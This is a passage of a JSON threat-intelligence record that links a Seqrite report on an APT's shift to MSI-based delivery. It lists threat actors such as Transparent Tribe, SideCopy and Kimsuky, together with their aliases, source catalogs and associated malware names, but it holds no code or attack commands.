		"https://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/"
	],
	"report_names": [
		"goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks"
	],
	"threat_actors": [
		{
			"id": "414d7c65-5872-4e56-8a7d-49a2aeef1632",
			"created_at": "2025-08-07T02:03:24.7983Z",
			"updated_at": "2026-04-10T02:00:03.76109Z",
			"deleted_at": null,
			"main_name": "COPPER FIELDSTONE",
			"aliases": [
				"APT36 ",
				"Earth Karkaddan ",
				"Gorgon Group ",
				"Green Havildar ",
				"Mythic Leopard ",
				"Operation C-Major ",
				"Operation Transparent Tribe ",
				"Pasty Draco ",
				"ProjectM ",
				"Storm-0156 "
			],
			"source_name": "Secureworks:COPPER FIELDSTONE",
			"tools": [
				"CapraRAT",
				"Crimson RAT",
				"DarkComet",
				"ElizaRAT",
				"LuminosityLink",
				"ObliqueRAT",
				"Peppy",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "187a0668-a968-4cf0-8bfd-4bc97c02f6dc",
			"created_at": "2022-10-27T08:27:12.955905Z",
			"updated_at": "2026-04-10T02:00:05.376527Z",
			"deleted_at": null,
			"main_name": "SideCopy",
			"aliases": [
				"SideCopy"
			],
			"source_name": "MITRE:SideCopy",
			"tools": [
				"AuTo Stealer",
				"Action RAT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "fce5181c-7aab-400f-bd03-9db9e791da04",
			"created_at": "2022-10-25T15:50:23.759799Z",
			"updated_at": "2026-04-10T02:00:05.3002Z",
			"deleted_at": null,
			"main_name": "Transparent Tribe",
			"aliases": [
				"Transparent Tribe",
				"COPPER FIELDSTONE",
				"APT36",
				"Mythic Leopard",
				"ProjectM"
			],
			"source_name": "MITRE:Transparent Tribe",
			"tools": [
				"DarkComet",
				"ObliqueRAT",
				"njRAT",
				"Peppy"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "64a08f65-4ef8-4ad5-bac1-ce4e0fd2808c",
			"created_at": "2024-08-28T02:02:09.663698Z",
			"updated_at": "2026-04-10T02:00:04.927384Z",
			"deleted_at": null,
			"main_name": "TAG-100",
			"aliases": [
				"Storm-2077"
			],
			"source_name": "ETDA:TAG-100",
			"tools": [
				"Agentemis",
				"Cobalt Strike",
				"CobaltStrike",
				"CrossC2",
				"LESLIELOADER",
				"Pantegana",
				"SparkRAT",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a4f0e383-f447-4cd6-80e3-ffc073ed4e00",
			"created_at": "2023-01-06T13:46:39.30167Z",
			"updated_at": "2026-04-10T02:00:03.280161Z",
			"deleted_at": null,
			"main_name": "SideCopy",
			"aliases": [],
			"source_name": "MISPGALAXY:SideCopy",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d",
			"created_at": "2025-08-07T02:03:25.101147Z",
			"updated_at": "2026-04-10T02:00:03.846812Z",
			"deleted_at": null,
			"main_name": "NICKEL KIMBALL",
			"aliases": [
				"APT43 ",
				"ARCHIPELAGO ",
				"Black Banshee ",
				"Crooked Pisces ",
				"Emerald Sleet ",
				"ITG16 ",
				"Kimsuky ",
				"Larva-24005 ",
				"Opal Sleet ",
				"Ruby Sleet ",
				"SharpTongue ",
				"Sparking Pisces ",
				"Springtail ",
				"TA406 ",
				"TA427 ",
				"THALLIUM ",
				"UAT-5394 ",
				"Velvet Chollima "
			],
			"source_name": "Secureworks:NICKEL KIMBALL",
			"tools": [
				"BabyShark",
				"FastFire",
				"FastSpy",
				"FireViewer",
				"Konni"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "235831df-8daf-4a88-945e-db4e7ef06ac6",
			"created_at": "2023-11-17T02:00:07.606121Z",
			"updated_at": "2026-04-10T02:00:03.458263Z",
			"deleted_at": null,
			"main_name": "DragonSpark",
			"aliases": [],
			"source_name": "MISPGALAXY:DragonSpark",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "0e9d99dc-01ad-49a5-8357-5f147d38559b",
			"created_at": "2024-09-20T02:00:04.587227Z",
			"updated_at": "2026-04-10T02:00:03.701875Z",
			"deleted_at": null,
			"main_name": "UAT-5394",
			"aliases": [],
			"source_name": "MISPGALAXY:UAT-5394",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "99aa0795-8936-45db-a397-6d01131fcdcd",
			"created_at": "2023-02-18T02:04:24.085379Z",
			"updated_at": "2026-04-10T02:00:04.654299Z",
			"deleted_at": null,
			"main_name": "DragonSpark",
			"aliases": [],
			"source_name": "ETDA:DragonSpark",
			"tools": [
				"BadPotato",
				"CHINACHOPPER",
				"China Chopper",
				"GotoHTTP",
				"SharpToken",
				"SinoChopper",
				"SparkRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "b584b10a-7d54-4d05-9e21-b223563df7b8",
			"created_at": "2022-10-25T16:07:24.181589Z",
			"updated_at": "2026-04-10T02:00:04.892659Z",
			"deleted_at": null,
			"main_name": "SideCopy",
			"aliases": [
				"G1008",
				"Mocking Draco",
				"TAG-140",
				"UNC2269",
				"White Dev 55"
			],
			"source_name": "ETDA:SideCopy",
			"tools": [
				"ActionRAT",
				"AllaKore",
				"Allakore RAT",
				"AresRAT",
				"Bladabindi",
				"CetaRAT",
				"DetaRAT",
				"EpicenterRAT",
				"Jorik",
				"Lilith",
				"Lilith RAT",
				"MargulasRAT",
				"ReverseRAT",
				"njRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "db5b833a-965e-4f46-b75d-7e829466a5fa",
			"created_at": "2024-12-21T02:00:02.843374Z",
			"updated_at": "2026-04-10T02:00:03.780907Z",
			"deleted_at": null,
			"main_name": "Storm-2077",
			"aliases": [
				"TAG-100",
				"RedNovember"
			],
			"source_name": "MISPGALAXY:Storm-2077",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "abb24b7b-6baa-4070-9a2b-aa59091097d1",
			"created_at": "2022-10-25T16:07:24.339942Z",
			"updated_at": "2026-04-10T02:00:04.944806Z",
			"deleted_at": null,
			"main_name": "Transparent Tribe",
			"aliases": [
				"APT 36",
				"APT-C-56",
				"Copper Fieldstone",
				"Earth Karkaddan",
				"G0134",
				"Green Havildar",
				"Mythic Leopard",
				"Opaque Draco",
				"Operation C-Major",
				"Operation Honey Trap",
				"Operation Transparent Tribe",
				"ProjectM",
				"STEPPY-KAVACH",
				"Storm-0156",
				"TEMP.Lapis",
				"Transparent Tribe"
			],
			"source_name": "ETDA:Transparent Tribe",
			"tools": [
				"Amphibeon",
				"Android RAT",
				"Bezigate",
				"Bladabindi",
				"Bozok",
				"Bozok RAT",
				"BreachRAT",
				"Breut",
				"CapraRAT",
				"CinaRAT",
				"Crimson RAT",
				"DarkComet",
				"DarkKomet",
				"ElizaRAT",
				"FYNLOS",
				"Fynloski",
				"Jorik",
				"Krademok",
				"Limepad",
				"Luminosity RAT",
				"LuminosityLink",
				"MSIL",
				"MSIL/Crimson",
				"Mobzsar",
				"MumbaiDown",
				"Oblique RAT",
				"ObliqueRAT",
				"Peppy RAT",
				"Peppy Trojan",
				"Quasar RAT",
				"QuasarRAT",
				"SEEDOOR",
				"Scarimson",
				"SilentCMD",
				"Stealth Mango",
				"UPDATESEE",
				"USBWorm",
				"Waizsar RAT",
				"Yggdrasil",
				"beendoor",
				"klovbot",
				"njRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "c68fa27f-e8d9-4932-856b-467ccfe39997",
			"created_at": "2023-01-06T13:46:38.450585Z",
			"updated_at": "2026-04-10T02:00:02.980334Z",
			"deleted_at": null,
			"main_name": "Operation C-Major",
			"aliases": [
				"APT36",
				"APT 36",
				"TMP.Lapis",
				"COPPER FIELDSTONE",
				"Storm-0156",
				"Transparent Tribe",
				"ProjectM",
				"Green Havildar",
				"Earth Karkaddan",
				"C-Major",
				"Mythic Leopard"
			],
			"source_name": "MISPGALAXY:Operation C-Major",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "71a1e16c-3ba6-4193-be62-be53527817bc",
			"created_at": "2022-10-25T16:07:23.753455Z",
			"updated_at": "2026-04-10T02:00:04.73769Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"APT 43",
				"Black Banshee",
				"Emerald Sleet",
				"G0086",
				"G0094",
				"ITG16",
				"KTA082",
				"Kimsuky",
				"Larva-24005",
				"Larva-25004",
				"Operation Baby Coin",
				"Operation Covert Stalker",
				"Operation DEEP#DRIVE",
				"Operation DEEP#GOSU",
				"Operation Kabar Cobra",
				"Operation Mystery Baby",
				"Operation Red Salt",
				"Operation Smoke Screen",
				"Operation Stealth Power",
				"Operation Stolen Pencil",
				"SharpTongue",
				"Sparkling Pisces",
				"Springtail",
				"TA406",
				"TA427",
				"Thallium",
				"UAT-5394",
				"Velvet Chollima"
			],
			"source_name": "ETDA:Kimsuky",
			"tools": [
				"AngryRebel",
				"AppleSeed",
				"BITTERSWEET",
				"BabyShark",
				"BoBoStealer",
				"CSPY Downloader",
				"Farfli",
				"FlowerPower",
				"Gh0st RAT",
				"Ghost RAT",
				"Gold Dragon",
				"GoldDragon",
				"GoldStamp",
				"JamBog",
				"KGH Spyware Suite",
				"KGH_SPY",
				"KPortScan",
				"KimJongRAT",
				"Kimsuky",
				"LATEOP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Lovexxx",
				"MailPassView",
				"Mechanical",
				"Mimikatz",
				"MoonPeak",
				"Moudour",
				"MyDogs",
				"Mydoor",
				"Network Password Recovery",
				"PCRat",
				"ProcDump",
				"PsExec",
				"ReconShark",
				"Remote Desktop PassView",
				"SHARPEXT",
				"SWEETDROP",
				"SmallTiger",
				"SniffPass",
				"TODDLERSHARK",
				"TRANSLATEXT",
				"Troll Stealer",
				"TrollAgent",
				"VENOMBITE",
				"WebBrowserPassView",
				"xRAT"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434249,
	"ts_updated_at": 1775792261,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4bf5f63f9ac5ee363cccdecd9541e313fe8d962c.pdf",
		"text": "https://archive.orkl.eu/4bf5f63f9ac5ee363cccdecd9541e313fe8d962c.txt",
		"img": "https://archive.orkl.eu/4bf5f63f9ac5ee363cccdecd9541e313fe8d962c.jpg"
	}
}